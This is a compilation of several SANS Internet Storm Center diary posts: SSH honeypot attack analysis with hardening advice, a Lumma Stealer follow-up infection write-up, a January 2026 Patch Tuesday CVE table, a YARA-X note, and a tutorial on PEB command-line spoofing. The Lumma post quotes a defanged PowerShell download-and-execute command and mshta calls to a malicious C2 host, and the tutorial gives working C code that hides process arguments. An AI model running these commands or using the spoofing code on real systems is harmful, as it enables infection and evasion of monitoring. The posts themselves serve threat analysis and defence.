This malware stems from a series of Chinese IPs that are all within the same ASN. While I cannot directly relate these to the suspected “Outlaw” scripts earlier, the Kibana logs are interesting for these IPs. They all start with a successful SSH connection and quickly move to an SFTP transfer of the malware. The malware itself appears to be a Go binary which is a deviation from the expected “Perl-based backdoor” noted by TrendMicro [4].
With this unlikely to be “Outlaw” directly, I am choosing to include this activity for two main reasons:

1) I am using “Outlaw” activity as more of a threat model rather than the group being the primary subject for this post
2) Each occurrence of this payload is precluded by activity identical or nearly identical to the scanning and persistence discussed earlier

This behavior is suggestive of either an evolution of processes by implementing specialization within the organization or the IAB-like activity mentioned earlier.

This malware was the result of:

shield@dshield:/srv/cowrie/var/lib/cowrie/downloads$ sudo strings -a 649eecfd7b02b59248ef5d1fce494e2f1b9d2fc20eef43fc4c74be8bc10ce1c1 -n 80 | less

What Can Be Done?

In the Early Recognition section, I gave a few suggestions of what you can do to cutoff the threat actor at the first sign of intrusion. This section aims to use some best practices to defend the network against this type of activity.

• Enforce strong authentication controls for remote access by disabling password-based SSH authentication in favor of key-based authentication
• Enforce multi-factor authentication (MFA) for administrative access were supported
• Use TCP Wrappers (/etc/hosts.allow and /etc/hosts.deny) as a defense-in-depth mechanism to restrict access to known management networks and reduce unauthenticated connection attempts
• Apply file integrity monitoring (FIM) to critical system and configuration files, including /etc/hosts.allow, /etc/hosts.deny, user .ssh directories, authorized_keys, and cron configurations
• Monitor for post-exploitation enumeration activity by alerting on rapid execution of common reconnaissance commands such as uname, lscpu, cat /proc/cpuinfo, w, top, and crontab -l
• Detect and investigate destructive or preparatory commands often used to enable persistence, such as recursive deletion of .ssh directories, use of chattr
• Routinely audit user accounts, group memberships, and privilege assignments
• Centralize authentication, process execution, and network logs, ensuring a minimum of 90 days log retention to support incident response and threat hunting activities
• Perform routine patching and vulnerability management for operating systems and exposed services to reduce the effectiveness of automated exploitation and scanning frameworks
• Test and exercise the incident response plan (IRP) to ensure rapid containment, isolation, and investigation can occur when early indicators of compromise are detected
• Consider investing resources into Threat Hunting and Cyber Threat Intelligence to better identify and predict adversarial activity

Conclusion

This style of attack (Password spray of SSH -> System enumeration -> Persistence mechanisms via SSH -> Transfer of malicious file) is the most common attack I witnessed while monitoring DShield via Kibana. While it makes sense for a cybercrime organization to carry this out due to the amount of automation that can be used, the actual attack chains seem to be relatively simple to defend. We have seen cybercrime organizations specialize and organize in a more corporate structure, meaning certain organizations deal in initial access, others exploitation, and other actions on objective. It seems cryptojacking goups like ‘Outlaw’ would fall more on the initial access side with them choosing whether or not the victim fits their use case. What we can do is continue to encourage defenders to stay up to date with CTI and take a proactive approach to threat hunting we can make the job of the adversary significantly more difficult. Ultimately stifling the IABs, reducing funding to lower tiered groups, and potentially destabilizing the structure and segmentation of roles within the cybercrime field.

[1] https://isc.sans.edu/diary/Decoding+the+Patterns+Analyzing+DShield+Honeypot+Activity+Guest+Diary/30428
[2] https://www.attackiq.com/glossary/pyramid-of-pain-2/
[3] https://isc.sans.edu/diary/DShield+Honeypot+Activity+for+May+2023/29932
[4] https://www.trendmicro.com/en_us/research/19/f/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor.html
[5] https://krebsonsecurity.com/tag/ddos-for-hire/
[6] https://attack.mitre.org/
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

In recent weeks, Lumma Stealer infections have followed a specific pattern in follow-up activity. This pattern adds scheduled tasks for the same action, which increases traffic to the same C2 domain. This diary documents an example from one of these infections on January 14, 2026.

Details

After Lumma Stealer performs its data exfiltration, the infected Windows host retrieves information from a Pastebin link, which the infected host uses for a follow-up infection. So far, this follow-up infection has used .cc domains for its C2 traffic. Here is one such example from the beginning of January 2026.

The image below shows an example of a Lumma Stealer infection from today.

Shown above: Traffic from a Lumma Stealer infection today filtered in Wireshark.

The follow-up infection from Lumma Stealer activity begins with a Pastebin URL, which is hxxps[:]//pastebin[.]com/raw/xRmmdinT seen as recently today, as January 14, 2026.

Shown above: Pastebin URL used for the follow-up infection shown in a web browser.

The Pastebin URL returns the following PowerShell command:

irm hxxps[:]//fileless-market[.]cc/Notes.pdf | iex

This leads to several follow-up HTTPS requests for hxxps[:]//fileless-market[.]cc/ as time progresses. These HTTPS requests are caused by commands for mshta hxxps[:]//fileless-market[.]cc/ that in turn generate a scheduled task to perform the same command.

This activity appears to build on itself. Almost 11 hours after an initial infection, the infected Windows host in my lab had 31 scheduled tasks with different names, but they all had the same trigger and action: running the mshta command for hxxps[:]//fileless-market[.]cc/.

Shown above: Task scheduler for the infected Windows host showing multiple tasks generated by this infection after several hours.

This generated more C2 traffic to fileless-market[.]cc as the hours passed. On January 14, 2026 at 16:02 UTC, I saw 33 TCP streams for HTTPS sessions to this C2 server.

Shown above: 33 TCP streams for HTTPS sessions to fileless-market[.]cc from this infection.

Final Words

This C2 activity seems a bit unusual. I've never seen it before. I chatted about this with some of the other handlers, and they did not remember seeing this type of increase in scheduled tasks and post-infection traffic. If anyone else has noticed activity like this, please leave a comment!

Bradley Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today, Microsoft released patches for 113 vulnerabilities. One of these vulnerabilities affected the Edge browser and was patched upstream by Chromium.

Eight of the vulnerabilities are rated critical. One has been disclosed before today, and one is already being exploited. Five of the critical vulnerabilities affect Microsoft Office components.

Noteworthy Vulnerabilities

%%cve:2026-20854%%: A remote code execution vulnerability in LSASS. This brings back memories from hallmark Windows security events like the Blaster worm. However, in this case, the attacker must be authenticated. But the attacker does not need elevated privileges. Microsoft considers exploitation less likely. 

%%cve:2026-20805%%: This is an information disclosure vulnerability in the Desktop Windows Manager, and it is already being exploited. The vulnerability can be used to identify the section address from a remote ALPC port. 

%%cve:2026-21265%%: Secure boot may not recognize an expired certificate. This problem was already disclosed, but so far hasn't been exploited.

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
Azure Connected Machine Agent Elevation of Privilege Vulnerability
%%cve:2026-21224%%	No	No	-	-	Important	7.8	6.8
Azure Core shared client library for Python Remote Code Execution Vulnerability
%%cve:2026-21226%%	No	No	-	-	Important	7.5	6.5
Capability Access Management Service (camsvc) Elevation of Privilege Vulnerability
%%cve:2026-20815%%	No	No	-	-	Important	7.0	6.1
%%cve:2026-20830%%	No	No	-	-	Important	7.0	6.1
%%cve:2026-21221%%	No	No	-	-	Important	7.0	6.1
Capability Access Management Service (camsvc) Information Disclosure Vulnerability
%%cve:2026-20835%%	No	No	-	-	Important	5.5	4.8
%%cve:2026-20851%%	No	No	-	-	Important	6.2	5.4
Chromium: CVE-2026-0628 Insufficient policy enforcement in WebView tag
%%cve:2026-0628%%	No	No	-	-	-
Desktop Window Manager Information Disclosure Vulnerability
%%cve:2026-20805%%	No	Yes	-	-	Important	5.5	4.8
Desktop Windows Manager Elevation of Privilege Vulnerability
%%cve:2026-20871%%	No	No	-	-	Important	7.8	6.8
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2026-20814%%	No	No	-	-	Important	7.0	6.1
%%cve:2026-20836%%	No	No	-	-	Important	7.0	6.1
Dynamic Root of Trust for Measurement (DRTM) Information Disclosure Vulnerability
%%cve:2026-20962%%	No	No	-	-	Important	4.4	3.9
Host Process for Windows Tasks Elevation of Privilege Vulnerability
%%cve:2026-20941%%	No	No	-	-	Important	7.8	6.8
Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability
%%cve:2026-21219%%	No	No	-	-	Important	7.0	6.1
LDAPTampering Vulnerability
%%cve:2026-20812%%	No	No	-	-	Important	6.5	5.7
Microsoft DWM Core Library Elevation of Privilege Vulnerability
%%cve:2026-20842%%	No	No	-	-	Important	7.0	6.1
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2026-20946%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20955%%	No	No	-	-	Critical	7.8	6.8
%%cve:2026-20956%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20950%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20957%%	No	No	-	-	Critical	7.8	6.8
Microsoft Excel Security Feature Bypass Vulnerability
%%cve:2026-20949%%	No	No	-	-	Important	7.8	6.8
Microsoft Office Click-To-Run Elevation of Privilege Vulnerability
%%cve:2026-20943%%	No	No	-	-	Important	7.0	6.1
Microsoft Office Remote Code Execution Vulnerability
%%cve:2026-20953%%	No	No	-	-	Critical	8.4	7.3
%%cve:2026-20952%%	No	No	-	-	Critical	8.4	7.3
Microsoft SQL Server Elevation of Privilege Vulnerability
%%cve:2026-20803%%	No	No	-	-	Important	7.2	6.3
Microsoft SharePoint Information Disclosure Vulnerability
%%cve:2026-20958%%	No	No	-	-	Important	5.4	4.7
Microsoft SharePoint Remote Code Execution Vulnerability
%%cve:2026-20963%%	No	No	-	-	Important	8.8	7.7
Microsoft SharePoint Server Remote Code Execution Vulnerability
%%cve:2026-20951%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20947%%	No	No	-	-	Important	8.8	7.7
Microsoft SharePoint Server Spoofing Vulnerability
%%cve:2026-20959%%	No	No	-	-	Important	4.6	4.0
Microsoft Windows File Explorer Spoofing Vulnerability
%%cve:2026-20847%%	No	No	-	-	Important	6.5	5.7
Microsoft Word Remote Code Execution Vulnerability
%%cve:2026-20944%%	No	No	-	-	Critical	8.4	7.3
%%cve:2026-20948%%	No	No	-	-	Important	7.8	6.8
NTLM Hash Disclosure Spoofing Vulnerability
%%cve:2026-20925%%	No	No	-	-	Important	6.5	5.7
%%cve:2026-20872%%	No	No	-	-	Important	6.5	5.7
Remote Procedure Call Information Disclosure Vulnerability
%%cve:2026-20821%%	No	No	-	-	Important	6.2	5.4
Secure Boot Certificate Expiration Security Feature Bypass Vulnerability
%%cve:2026-21265%%	Yes	No	-	-	Important	6.4	5.6
TPM Trustlet Information Disclosure Vulnerability
%%cve:2026-20829%%	No	No	-	-	Important	5.5	4.8
Tablet Windows User Interface (TWINUI) Subsystem Information Disclosure Vulnerability
%%cve:2026-20826%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20827%%	No	No	-	-	Important	5.5	4.8
Win32k Elevation of Privilege Vulnerability
%%cve:2026-20811%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20920%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20863%%	No	No	-	-	Important	7.0	6.1
Windows Admin Center Elevation of Privilege Vulnerability
%%cve:2026-20965%%	No	No	-	-	Important	7.5	6.5
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
%%cve:2026-20810%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20831%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20860%%	No	No	-	-	Important	7.8	6.8
Windows Client-Side Caching (CSC) Service Information Disclosure Vulnerability
%%cve:2026-20839%%	No	No	-	-	Important	5.5	4.8
Windows Clipboard Server Elevation of Privilege Vulnerability
%%cve:2026-20844%%	No	No	-	-	Important	7.4	6.4
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
%%cve:2026-20857%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20940%%	No	No	-	-	Important	7.8	6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2026-20820%%	No	No	-	-	Important	7.8	6.8
Windows Connected Devices Platform Service Elevation of Privilege Vulnerability
%%cve:2026-20864%%	No	No	-	-	Important	7.8	6.8
Windows Deployment Services Remote Code Execution Vulnerability
%%cve:2026-0386%%	No	No	-	-	Important	7.5	6.5
Windows Error Reporting Service Elevation of Privilege Vulnerability
%%cve:2026-20817%%	No	No	-	-	Important	7.8	6.8
Windows File Explorer Elevation of Privilege Vulnerability
%%cve:2026-20808%%	No	No	-	-	Important	7.0	6.1
Windows File Explorer Information Disclosure Vulnerability
%%cve:2026-20823%%	No	No	-	-	Important	5.5	4.8
%%cve:2026-20932%%	No	No	-	-	Important	5.5	4.8
%%cve:2026-20937%%	No	No	-	-	Important	5.5	4.8
%%cve:2026-20939%%	No	No	-	-	Important	5.5	4.8
Windows Graphics Component Elevation of Privilege Vulnerability
%%cve:2026-20822%%	No	No	-	-	Critical	7.8	6.8
Windows HTTP.sys Elevation of Privilege Vulnerability
%%cve:2026-20929%%	No	No	-	-	Important	7.5	6.5
Windows Hello Tampering Vulnerability
%%cve:2026-20804%%	No	No	-	-	Important	7.7	6.7
%%cve:2026-20852%%	No	No	-	-	Important	7.7	6.7
Windows Hyper-V Information Disclosure Vulnerability
%%cve:2026-20825%%	No	No	-	-	Important	4.4	3.9
Windows Installer Elevation of Privilege Vulnerability
%%cve:2026-20816%%	No	No	-	-	Important	7.8	6.8
Windows Kerberos Elevation of Privilege Vulnerability
%%cve:2026-20849%%	No	No	-	-	Important	7.5	6.5
Windows Kerberos Information Disclosure Vulnerability
%%cve:2026-20833%%	No	No	-	-	Important	5.5	4.8
Windows Kernel Information Disclosure Vulnerability
%%cve:2026-20818%%	No	No	-	-	Important	6.2	5.4
%%cve:2026-20838%%	No	No	-	-	Important	5.5	4.8
Windows Kernel Memory Elevation of Privilege Vulnerability
%%cve:2026-20809%%	No	No	-	-	Important	7.8	6.8
Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
%%cve:2026-20859%%	No	No	-	-	Important	7.8	6.8
Windows Local Security Authority Subsystem Service (LSASS) Denial of Service Vulnerability
%%cve:2026-20875%%	No	No	-	-	Important	7.5	6.5
Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability
%%cve:2026-20854%%	No	No	-	-	Critical	7.5	6.5
Windows Local Session Manager (LSM) Elevation of Privilege Vulnerability
%%cve:2026-20869%%	No	No	-	-	Important	7.0	6.1
Windows Management Services Elevation of Privilege Vulnerability
%%cve:2026-20858%%	No	No	-	-	Important	7.8	6.9
%%cve:2026-20865%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20877%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20918%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20923%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20924%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20861%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20866%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20867%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20873%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20874%%	No	No	-	-	Important	7.8	6.8
Windows Management Services Information Disclosure Vulnerability
%%cve:2026-20862%%	No	No	-	-	Important	5.5	4.8
Windows Media Remote Code Execution Vulnerability
%%cve:2026-20837%%	No	No	-	-	Important	7.8	6.8
Windows NDIS Information Disclosure Vulnerability
%%cve:2026-20936%%	No	No	-	-	Important	4.3	3.8
Windows NTFS Remote Code Execution Vulnerability
%%cve:2026-20840%%	No	No	-	-	Important	7.8	6.8
%%cve:2026-20922%%	No	No	-	-	Important	7.8	6.8
Windows Remote Assistance Security Feature Bypass Vulnerability
%%cve:2026-20824%%	No	No	-	-	Important	5.5	4.8
Windows Remote Procedure Call Interface Definition Language (IDL) Elevation of Privilege Vulnerability
%%cve:2026-20832%%	No	No	-	-	Important	7.8	6.8
Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability
%%cve:2026-20843%%	No	No	-	-	Important	7.8	6.8
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2026-20868%%	No	No	-	-	Important	8.8	7.7
Windows SMB Server Denial of Service Vulnerability
%%cve:2026-20927%%	No	No	-	-	Important	5.3	4.6
Windows SMB Server Elevation of Privilege Vulnerability
%%cve:2026-20919%%	No	No	-	-	Important	7.5	6.5
%%cve:2026-20921%%	No	No	-	-	Important	7.5	6.5
%%cve:2026-20926%%	No	No	-	-	Important	7.5	6.5
%%cve:2026-20934%%	No	No	-	-	Important	7.5	6.5
%%cve:2026-20848%%	No	No	-	-	Important	7.5	6.5
Windows Server Update Service (WSUS) Remote Code Execution Vulnerability
%%cve:2026-20856%%	No	No	-	-	Important	8.1	7.1
Windows Spoofing Vulnerability
%%cve:2026-20834%%	No	No	-	-	Important	4.6	4.0
Windows Telephony Service Elevation of Privilege Vulnerability
%%cve:2026-20931%%	No	No	-	-	Important	8.0	7.0
Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability
%%cve:2026-20876%%	No	No	-	-	Critical	6.7	5.8
%%cve:2026-20938%%	No	No	-	-	Important	7.8	6.8
Windows Virtualization-Based Security (VBS) Information Disclosure Vulnerability
%%cve:2026-20819%%	No	No	-	-	Important	5.5	4.8
%%cve:2026-20935%%	No	No	-	-	Important	6.2	5.4
Windows WalletService Elevation of Privilege Vulnerability
%%cve:2026-20853%%	No	No	-	-	Important	7.4	6.4
Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
%%cve:2026-20870%%	No	No	-	-	Important	7.8	6.8
Windows rndismp6.sys Information Disclosure Vulnerability
%%cve:2026-20828%%	No	No	-	-	Important	4.6	4.0

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA-X's 1.11.0 release brings a new feature: hash function warnings.

When you write a YARA rule to match a cryptographic hash (either the full file content or a part of it), what's actually going on are string comparisons:

Function hash.sha256 returns a string (the hexadecimal SHA256 hash it calculated) and that is compared to a literal string that is the hash you want to find.

If you make a mistake in your literal string hash (for example: unintentionally add an extra space), then the match will fail.

But YARA-X will now show a warning like this:

Another example is where you mixup hashes: you provide a SHA1 literal string hash, and it should be a SHA256.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reverse engineers must have a good understanding of the environment where malware are executed (read: the operating system). In a previous diary, I talked about malicious code that could be executed when loading a DLL[1]. Today, I’ll show you how a malware can hide suspicious information related to created processes.

The API call CreateProcess() is dedicated to, guess what, the creation of new processes![2] I won’t discuss all the parameters here but you have to know to it’s possible to specify some flags that will describe how the process will be created. One of them is CREATE_SUSPENDED (0x00000004). It will instruct the OS to create the process but not launch it automatically. This flag is usually a good sign of maliciousness (example in case of process hollowing)

Every process has a specific structure called the “PEB” (“Process Environment Block”)[3]. It’s a user-mode data structure in Windows that the operating system maintains for each running process to store essential runtime information such as loaded modules, process parameters, heap pointers, environment variables, and debugging flags.

The key element in the previous paragraph is user-mode. It means that a process is able to access its own PEB (example: to detect the presence of a debugger attached to the process) but also to modify it!

Let’s take a practical example where a malware needs to spawn a cmd.exe with some parameters. We can spoof the command line by modifying the PEB in a few steps:

1. Locate the PEB
2. Read the process parameters
3. Overwrite them
4. Resume the process

Here is a proof-of-concept:

#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")

int main() {
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi;
 
    // Start a process with some parameters
    BOOL success = CreateProcessA(
        "C:\\Windows\\System32\\cmd.exe",
        (LPSTR)"cmd.exe /c echo I am malicious! }:->",
        NULL, NULL, FALSE,
        CREATE_SUSPENDED,
        NULL, NULL, &si, &pi
    );

    if (success) {
        PROCESS_BASIC_INFORMATION pbi;
        ULONG returnLength;

        // Get the PEB address
        NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);

        // Read ProcessParameters
        PEB peb;
        ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);

        RTL_USER_PROCESS_PARAMETERS params;
        ReadProcessMemory(pi.hProcess, peb.ProcessParameters, &params, sizeof(RTL_USER_PROCESS_PARAMETERS), NULL);

        // Overwrite the CommandLine buffer
        WCHAR newCmd[] = L"cmd.exe /c echo Nothing to see here!";
        WriteProcessMemory(pi.hProcess, params.CommandLine.Buffer, newCmd, sizeof(newCmd), NULL);
        printf("Press enter to continue and resume the process...\n");
        getchar();

        // Resume the process
        ResumeThread(pi.hThread);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
        printf("Process resumed with modified PEB.\n");
    }
    return 0;
}

Once you launch poc.exe, check the cmd.exe process:

With this scenario, cmd.exe is executed with the new parameters. What about modifying a running process and hide (not spoof) its parameters?

To achieve this, the process does not have to be created in suspended state but it must be kept running! The idea is to get a handle on the process and modify its PEB:

void modifyRunningProcess(DWORD pid, const wchar_t* newCmd) {
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProcess) return;

    PROCESS_BASIC_INFORMATION pbi;
    ULONG retLen;
    NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &retLen);

    PEB peb;
    ReadProcessMemory(hProcess, pbi.PebBaseAddress, &peb, sizeof(PEB), NULL);

    RTL_USER_PROCESS_PARAMETERS params;
    ReadProcessMemory(hProcess, peb.ProcessParameters, &params, sizeof(params), NULL);

    USHORT newSize = (USHORT)(wcslen(newCmd) * sizeof(WCHAR));
    WriteProcessMemory(hProcess, params.CommandLine.Buffer, newCmd, newSize + 2, NULL);
    WriteProcessMemory(hProcess, (PBYTE)peb.ProcessParameters + offsetof(RTL_USER_PROCESS_PARAMETERS, CommandLine.Length), 
​​​​​​​                       &newSize, sizeof(USHORT), NULL);

    CloseHandle(hProcess);
    printf("PEB Updated for PID: %d\n", pid);
}

By aware that this technique has an important limitation, you must replace the existing command line with a less (with trailing spaces) or equal length, otherwise there is a risk of buffer overflow! Finally, this technique will not prevent tools like EDRs to log the orignial parameters because they are logged at process creation. Hopefully!

[1] https://isc.sans.edu/diary/Abusing+DLLs+EntryPoint+for+the+Fun/32562
[2] https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
[3] https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.